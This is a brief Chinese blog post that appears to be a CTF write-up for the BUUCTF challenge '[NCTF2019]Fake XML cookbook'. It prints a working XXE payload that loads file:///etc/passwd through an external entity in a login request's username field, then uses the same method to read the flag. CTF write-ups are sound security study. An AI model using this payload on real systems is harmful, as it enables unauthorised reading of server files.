BUUCTF-NCTF做题笔记

BUUCTF
发布日期:   2022-01-10
文章字数:   72

[NCTF2019]Fake XML cookbook

  1. 随便输入用户名和密码,进行抓包

image-20220207111220509

  1. 发现是xml,尝试xxePayload
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE note [
  <!ENTITY admin SYSTEM "file:///etc/passwd">
  ]>
<user><username>&admin;</username><password>123456</password></user>

可以读取到/etc/passwd

image-20220207111337103

  1. 尝试读取flag文件

image-20220207111424823

文章作者: 尘落
文章链接: http://39.105.134.199/2022/01/10/711.html
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 尘落 !
BUUCTF
评论
  目录